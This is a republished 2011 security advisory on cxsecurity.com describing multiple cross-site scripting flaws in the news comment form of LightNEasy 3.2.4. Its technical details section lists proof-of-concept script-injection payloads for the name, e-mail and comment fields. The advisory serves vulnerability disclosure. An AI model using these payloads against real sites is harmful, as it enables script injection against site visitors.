LightNEasy 3.2.4 Multiple XSS vulnerabilities

2011.10.05
Credit: sschurtz
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 3.5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 6.8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

Advisory: Multiple XSS vulnerabilities in LightNEasy Advisory ID: SSCHADV2011-013 Author: Stefan Schurtz Affected Software: 3.2.4 Vendor URL: http://www.lightneasy.org/ Vendor Status: informed CVE-ID: - ========================== Vulnerability Description: ========================== LightNEasy is prone to multiple XSS vulnerabilities ================== Technical Details: ================== http://<target>/lightneasy/LightNEasy.php?page=news //commentemail Your name: blah Your e-mail: '"</style></script><script>alert(0x000296)</script> Your comment: blah Code: 666 //commentmessage Your name: blah Your e-mail: blah (at) blah (dot) de [email concealed] Your comment: </textarea></td></tr><script>alert('XSS')</script> Code: 666 //commentname Your name: '"</style></script><script>alert('XSS')</script> Your e-mail: blah (at) blah (dot) de [email concealed] Your comment: blah Code: 666 ========= Solution: ========= - ==================== Disclosure Timeline: ==================== 07-Sep-2011 - informed developers 07-Sep-2011 - release date of this security advisory ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: =========== http://www.lightneasy.org/ http://www.lightneasy.org/punbb/viewtopic.php?id=1464 http://www.rul3z.de/advisories/SSCHADV2011-013.txt

Referencje:

http://xforce.iss.net/xforce/xfdb/69737
http://www.securityfocus.com/archive/1/archive/1/519571/100/0/threaded
http://www.rul3z.de/advisories/SSCHADV2011-013.txt
http://www.lightneasy.org/punbb/viewtopic.php?id=1464
http://secunia.com/advisories/45955
http://osvdb.org/75262


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top